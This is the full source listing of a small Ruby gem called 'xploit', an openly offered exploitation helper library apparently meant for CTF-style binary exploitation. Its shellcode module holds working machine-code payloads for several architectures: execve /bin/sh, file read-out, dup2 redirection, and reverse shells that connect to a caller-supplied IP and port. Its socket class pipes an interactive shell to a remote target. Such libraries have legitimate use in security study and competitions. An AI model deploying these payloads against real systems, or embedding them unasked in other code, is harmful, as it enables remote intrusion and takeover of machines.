xploit 0.1.0

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA1:
+  metadata.gz: 15494f96a32a32a5c85191752fd6c61b88f8e035
+  data.tar.gz: 0ef01c65c9d05c7615db7fb3f941825490331f76
+SHA512:
+  metadata.gz: '08957b85c0d193d4139e56309781ad11682c7e326796479444081462e38a4953d4c2a29f6548fde086ab26658349131b5962b321f228be260eda8fa064a0e1c4'
+  data.tar.gz: 69b3b49122c2abb22038fd23d359a6efb829f5ffac495ad8df61b9d787891f46f3cf44ffb6e366a89d4d096eaa8f5513b187d1322799a5cd587841524d71c6db

data/.gitignore

@@ -0,0 +1,12 @@
+/.bundle/
+/.yardoc
+/Gemfile.lock
+/_yardoc/
+/coverage/
+/doc/
+/pkg/
+/spec/reports/
+/tmp/
+
+# rspec failure tracking
+.rspec_status

data/.rspec

@@ -0,0 +1,2 @@
+--format documentation
+--color

data/.travis.yml

@@ -0,0 +1,5 @@
+sudo: false
+language: ruby
+rvm:
+  - 2.4.0
+before_install: gem install bundler -v 1.15.3

data/CODE_OF_CONDUCT.md

@@ -0,0 +1,74 @@
+# Contributor Covenant Code of Conduct
+
+## Our Pledge
+
+In the interest of fostering an open and welcoming environment, we as
+contributors and maintainers pledge to making participation in our project and
+our community a harassment-free experience for everyone, regardless of age, body
+size, disability, ethnicity, gender identity and expression, level of experience,
+nationality, personal appearance, race, religion, or sexual identity and
+orientation.
+
+## Our Standards
+
+Examples of behavior that contributes to creating a positive environment
+include:
+
+* Using welcoming and inclusive language
+* Being respectful of differing viewpoints and experiences
+* Gracefully accepting constructive criticism
+* Focusing on what is best for the community
+* Showing empathy towards other community members
+
+Examples of unacceptable behavior by participants include:
+
+* The use of sexualized language or imagery and unwelcome sexual attention or
+advances
+* Trolling, insulting/derogatory comments, and personal or political attacks
+* Public or private harassment
+* Publishing others' private information, such as a physical or electronic
+  address, without explicit permission
+* Other conduct which could reasonably be considered inappropriate in a
+  professional setting
+
+## Our Responsibilities
+
+Project maintainers are responsible for clarifying the standards of acceptable
+behavior and are expected to take appropriate and fair corrective action in
+response to any instances of unacceptable behavior.
+
+Project maintainers have the right and responsibility to remove, edit, or
+reject comments, commits, code, wiki edits, issues, and other contributions
+that are not aligned to this Code of Conduct, or to ban temporarily or
+permanently any contributor for other behaviors that they deem inappropriate,
+threatening, offensive, or harmful.
+
+## Scope
+
+This Code of Conduct applies both within project spaces and in public spaces
+when an individual is representing the project or its community. Examples of
+representing a project or community include using an official project e-mail
+address, posting via an official social media account, or acting as an appointed
+representative at an online or offline event. Representation of a project may be
+further defined and clarified by project maintainers.
+
+## Enforcement
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be
+reported by contacting the project team at pgm3rdlinuxor1000@gmail.com. All
+complaints will be reviewed and investigated and will result in a response that
+is deemed necessary and appropriate to the circumstances. The project team is
+obligated to maintain confidentiality with regard to the reporter of an incident.
+Further details of specific enforcement policies may be posted separately.
+
+Project maintainers who do not follow or enforce the Code of Conduct in good
+faith may face temporary or permanent repercussions as determined by other
+members of the project's leadership.
+
+## Attribution
+
+This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
+available at [http://contributor-covenant.org/version/1/4][version]
+
+[homepage]: http://contributor-covenant.org
+[version]: http://contributor-covenant.org/version/1/4/

data/Gemfile

@@ -0,0 +1,7 @@
+source "https://rubygems.org"
+
+git_source(:github) {|repo_name| "https://github.com/#{repo_name}" }
+
+# Specify your gem's dependencies in xploit.gemspec
+gemspec
+gem "hexdump"

data/LICENSE.txt

@@ -0,0 +1,21 @@
+The MIT License (MIT)
+
+Copyright (c) 2017 Chihiro Hasegawa
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.

data/README.md

@@ -0,0 +1,27 @@
+# Xploit
+
+## Usage
+
+```
+require 'xploit'
+
+host = 'localhost'
+port = 8888
+
+if ARGV[0] == "r" # remote
+  host = 'remote.host'
+  port = 9999
+end
+
+Sock.open(host, port) do |s|
+
+  s.debug = true # default false	
+
+  puts s.recvline
+  
+  s.sendline("Here is shellcode")
+  
+  s.shell
+  
+end
+```

data/Rakefile

@@ -0,0 +1,6 @@
+require "bundler/gem_tasks"
+require "rspec/core/rake_task"
+
+RSpec::Core::RakeTask.new(:spec)
+
+task :default => :spec

data/bin/console

@@ -0,0 +1,14 @@
+#!/usr/bin/env ruby
+
+require "bundler/setup"
+require "xploit"
+
+# You can add fixtures and/or initialization code here to make experimenting
+# with your gem easier. You can also use a different console, if you like.
+
+# (If you use this, don't forget to add pry to your Gemfile!)
+# require "pry"
+# Pry.start
+
+require "irb"
+IRB.start(__FILE__)

data/bin/setup

@@ -0,0 +1,8 @@
+#!/usr/bin/env bash
+set -euo pipefail
+IFS=$'\n\t'
+set -vx
+
+bundle install
+
+# Do any other automated setup that you need to do here

data/lib/xploit.rb

@@ -0,0 +1,11 @@
+# encoding: ascii-8bit
+
+require "xploit/version"
+require "xploit/sock"
+require "xploit/util"
+require "xploit/shellcode"
+require "xploit/libc"
+require "xploit/constant"
+
+include Xploit
+include ::Pack

data/lib/xploit/constant.rb

@@ -0,0 +1,29 @@
+# coding: ascii-8bit
+
+module Xploit
+
+  NULL                = 0
+  STDIN_FILENO        = 0
+  STDOUT_FILENO       = 1
+  STDERR_FINENO       = 2
+  SEEK_SET            = 0
+  SEEK_CUR            = 1
+  SEEK_END            = 2
+  O_RDONLY            = 00000
+  O_WRONLY            = 00001
+  O_RDWR              = 00002
+  O_CREAT             = 00100
+  O_APPEND            = 02000
+  PROT_NONE           = 0b000
+  PROT_READ           = 0b001
+  PROT_WRITE          = 0b010
+  PROT_EXEC           = 0b100
+  PROT_RWX            = 0b111
+  MAP_SHARED          = 0b001
+  MAP_PRIVATE         = 0b010
+  MAP_ANONYMOUS       = 0x20
+  PREV_INUSE          = 0b001
+  IS_MMAPED           = 0b010
+  IS_NON_MAINARENA    = 0b100
+
+end

data/lib/xploit/libc.rb

@@ -0,0 +1,56 @@
+# coding: ascii-8bit
+
+module Xploit
+  
+  class Libc
+
+    def initialize(path)
+      
+      @func = {}
+      @string = {}
+      
+      res = `nm -t d -D #{path}`.split("\n")
+      res.each do |line|
+        offset, name = line.match(/(.+) . (.+)/)[1,2]
+        @func[name] = offset.to_i
+      end
+      
+      res = `strings -tx -a -t d #{path}`.split("\n")
+      res.each do |line|
+        offset, name = line.match(/(.+) (.+)/)[1,2]
+        @string[name] = offset.to_i
+      end
+      
+    end
+     
+    def symbol(key)
+      
+      if key.class != String
+        raise ArgumentError
+      end
+      
+      if @func.keys.include?(key)
+        @func[key]
+      else
+        raise ArgumentError, "Not found symbol: #{key}"
+      end
+      
+    end
+     
+    def string(key)
+      
+      if key.class != String
+        raise ArgumentError
+      end
+      
+      if @string.keys.include?(key)
+        @string[key]
+      else
+        raise ArgumentError, "Not found string: #{key}"
+      end
+      
+    end
+    
+  end
+
+end

data/lib/xploit/shellcode.rb

@@ -0,0 +1,61 @@
+# coding: ascii-8bit
+
+module Xploit
+
+  module Shellcode
+  
+    module_function
+    
+    def shellcode(arch)
+      case arch
+      when :x86
+        # http://inaz2.hatenablog.com/entry/2014/03/13/013056
+        "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
+      when :x64
+        # http://shell-storm.org/shellcode/files/shellcode-806.php
+        "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
+      when :arm
+        # http://shell-storm.org/shellcode/files/shellcode-698.php
+        "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x08\x30\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68"
+      when :mipsel
+        # https://www.exploit-db.com/exploits/35868/
+        "\xff\xff\x06\x28\xff\xff\xd0\x04\xff\xff\x05\x28\x01\x10\xe4\x27\x0f\xf0\x84\x24\xab\x0f\x02\x24\x0c\x01\x01\x01"
+      end
+    end
+   
+    def orw(arch, path)
+      case arch
+      # http://shell-storm.org/shellcode/files/shellcode-73.php
+      when :x86      
+        "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x32\x5b\xb0\x05\x31\xc9\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x8d\x0c\x24\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe6\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x83\xc4\x01\xeb\xdf\xe8\xc9\xff\xff\xff#{path}"
+        
+      # http://shell-storm.org/shellcode/files/shellcode-878.php
+      when :x64
+        "\xeb\x3f\x5f\x80\x77#{(path.length).chr}\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff#{path}A"
+      end
+    end
+    
+    def dup2(arch, newfd = 3)
+      case arch
+      when :x86
+        "\x31\xff\x6a\x3f\x58\x6a#{newfd.chr}\x5b\x89\xf9\xcd\x80\x47\x83\xff\x03\x75\xf0"
+      when :x64
+        "\x48\x31\xdb\x6a\x21\x58\x6a#{newfd.chr}\x5f\x48\x89\xde\x0f\x05\x48\xff\xc3\x48\x83\xfb\x03\x75\xec"
+      end
+    end
+   
+    def reverse_shell(arch, ip, port)
+      case arch
+      when :x86
+        # http://shell-storm.org/shellcode/files/shellcode-883.php
+        "\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68" + ip.split(".").map{|a| a.to_i.chr}.join + "\x66\x68" + [port].pack("n") + "\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
+      when :x64
+        # http://shell-storm.org/shellcode/files/shellcode-857.php
+        "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" + "\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" + "\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24" + "\x02" + [port].pack("n") + "\xc7\x44\x24\x04" + ip.split(".").map{|a| a.to_i.chr}.join + "\x48\x89\xe6\x6a\x10" + "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" + "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" + "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" + "\x5f\x6a\x3b\x58\x0f\x05"
+      end
+      
+    end
+    
+  end
+  
+end

data/lib/xploit/sock.rb

@@ -0,0 +1,97 @@
+# coding: ascii-8bit
+
+require 'socket'
+require 'hexdump'
+
+module Xploit
+  
+  class SendError < StandardError; end
+  class RecvError < StandardError; end
+   
+  class Sock
+   
+    attr_accessor :debug, :timeout
+    
+    def initialize(host, port, timeout = nil, debug = false)
+      @sock = TCPSocket.open(host, port)
+      @timeout = 0.5
+      @debug = debug
+      puts "[\e[32m*\e[0m] Connect to #{host}:#{port}"
+    end
+   
+    def self.open(host, port, timeout = nil, debug = false)
+      if block_given?
+        s = Sock.new(host, port, timeout, debug)
+        yield(s)
+        s.close
+      else
+        Sock.new(host, port, timeout, debug)
+      end
+    end
+   
+    def send(data, debug = false)
+      
+      @debug = debug
+      
+      puts "[\e[34m SEND \e[0m]" if @debug
+      len = @sock.write(data)
+      raise SendError if len != data.bytesize
+                 
+      Hexdump.dump(data) if @debug
+   
+      return len
+   
+    end
+   
+    def sendline(msg, debug = false)
+      send(msg + "\n", debug = debug)
+    end
+   
+    def recv(n = nil, delim = nil, debug = false)
+      
+      @debug = debug
+      puts "[ \e[35mRECV\e[0m ]" if @debug
+      
+      unless n.nil?
+        res = @sock.read(n)
+        Hexdump.dump(res) if @debug
+        return res
+      end
+      
+      res = ""
+      while select([@sock], nil, nil,timeout=@timeout)
+        s = @sock.read(1)
+        raise RecvError if s.length != 1
+        res << s
+        return res if not delim.nil? and res.include?(delim)
+      end
+      
+      Hexdump.dump(res) if @debug
+      
+      res
+      
+    end
+   
+    def recvuntil(delim, debug = false)
+      self.recv(n = nil, delim, debug)
+    end
+   
+    def recvline(debug = false)
+      recvuntil("\n", debug)
+    end
+    
+    def shell
+      STDOUT.sync = true
+      while s = STDIN.gets
+        self.send(s, @debug)
+        puts self.recv(n = nil, delim = nil, debug = @debug)
+      end
+    end
+   
+    def close
+      puts "[\e[32m*\e[0m] Close the connection"
+      @sock.close
+    end
+    
+  end
+end

data/lib/xploit/util.rb

@@ -0,0 +1,103 @@
+# coding: ascii-8bit
+
+module Xploit
+
+  module Pack
+    
+    PACK_HASH = {
+      byte: ['c', 1],
+      ubyte: ['C', 1],
+      word: ['s', 2],
+      uword: ['S', 2],
+      dword: ['l', 4],
+      udword: ['L', 4],
+      qword: ['q', 8],
+      uqword: ['Q', 8]
+    }
+
+    def p8(*data)
+      pack(data, :ubyte)
+    end
+
+    def pi8(*data)
+      pack(data, :byte)
+    end
+
+    def p16(*data)
+      pack(data, :uword)
+    end
+
+    def pi16(*data)
+      pack(data, :word)
+    end
+    
+    def p32(*data)
+      pack(data, :udword)
+    end
+
+    def pi32(*data)
+      pack(data, :dword)
+    end
+     
+    def p64(*data)
+      pack(data, :uqword)
+    end
+
+    def pi64(*data)
+      pack(data, :qword)
+    end
+
+    def u8(*data)
+      unpack(data, :ubyte)
+    end
+
+    def ui8(*data)
+      unpack(data, :byte)
+    end
+
+    def u16(*data)
+      unpack(data, :uword)
+    end
+
+    def ui16(*data)
+      unpack(data, :word)
+    end
+
+    def u32(*data)
+      unpack(data, :udword)
+    end
+     
+    def ui32(*data)
+      unpack(data, :dword)
+    end
+
+    def u64(*data)
+      unpack(data, :uqword)
+    end
+     
+    def ui64(*data)
+      unpack(data, :qword)
+    end
+    
+    def pack(data, type)
+      data.flatten.pack("#{PACK_HASH[type][0]}*")
+    end
+    
+    def unpack(data, type)
+      
+      tempchar, tempbyte = PACK_HASH[type]
+      
+      data = data.flatten.map do |d|
+        unless (pad_size = d.bytesize % tempbyte) == 0
+          pad_size = d.bytesize + tempbyte - (d.bytesize % tempbyte)
+        end
+        d.ljust(pad_size, "\x00").unpack("#{tempchar}*")
+      end
+      
+      data.flatten
+      
+    end
+    
+  end
+  
+end

data/lib/xploit/version.rb

@@ -0,0 +1,7 @@
+# coding: ascii-8bit
+
+module Xploit
+  
+  VERSION = "0.1.0"
+  
+end

data/xploit.gemspec

@@ -0,0 +1,28 @@
+# coding: utf-8
+lib = File.expand_path("../lib", __FILE__)
+$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
+require "xploit/version"
+
+Gem::Specification.new do |spec|
+  spec.name          = "xploit"
+  spec.version       = Xploit::VERSION
+  spec.authors       = ["Chihiro Hasegawa"]
+  spec.email         = ["pgm3rdlinuxor1000@gmail.com"]
+
+  spec.summary       = %q{Exploitation library for rubyist.}
+  spec.description   = %q{Exploitation library for rubyist.}
+  spec.homepage      = "https://github.com/owlinux1000/xploit"
+  spec.license       = "MIT"
+
+  spec.files         = `git ls-files -z`.split("\x0").reject do |f|
+    f.match(%r{^(test|spec|features)/})
+  end
+  
+  spec.bindir        = "exe"
+  spec.executables   = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
+  spec.require_paths = ["lib"]
+
+  spec.add_development_dependency "bundler", "~> 1.15"
+  spec.add_development_dependency "rake", "~> 10.0"
+  spec.add_development_dependency "rspec", "~> 3.0"
+end

metadata

@@ -0,0 +1,104 @@
+--- !ruby/object:Gem::Specification
+name: xploit
+version: !ruby/object:Gem::Version
+  version: 0.1.0
+platform: ruby
+authors:
+- Chihiro Hasegawa
+autorequire: 
+bindir: exe
+cert_chain: []
+date: 2017-11-07 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: bundler
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.15'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.15'
+- !ruby/object:Gem::Dependency
+  name: rake
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '10.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '10.0'
+- !ruby/object:Gem::Dependency
+  name: rspec
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.0'
+description: Exploitation library for rubyist.
+email:
+- pgm3rdlinuxor1000@gmail.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- ".gitignore"
+- ".rspec"
+- ".travis.yml"
+- CODE_OF_CONDUCT.md
+- Gemfile
+- LICENSE.txt
+- README.md
+- Rakefile
+- bin/console
+- bin/setup
+- lib/xploit.rb
+- lib/xploit/constant.rb
+- lib/xploit/libc.rb
+- lib/xploit/shellcode.rb
+- lib/xploit/sock.rb
+- lib/xploit/util.rb
+- lib/xploit/version.rb
+- xploit.gemspec
+homepage: https://github.com/owlinux1000/xploit
+licenses:
+- MIT
+metadata: {}
+post_install_message: 
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubyforge_project: 
+rubygems_version: 2.6.13
+signing_key: 
+specification_version: 4
+summary: Exploitation library for rubyist.
+test_files: []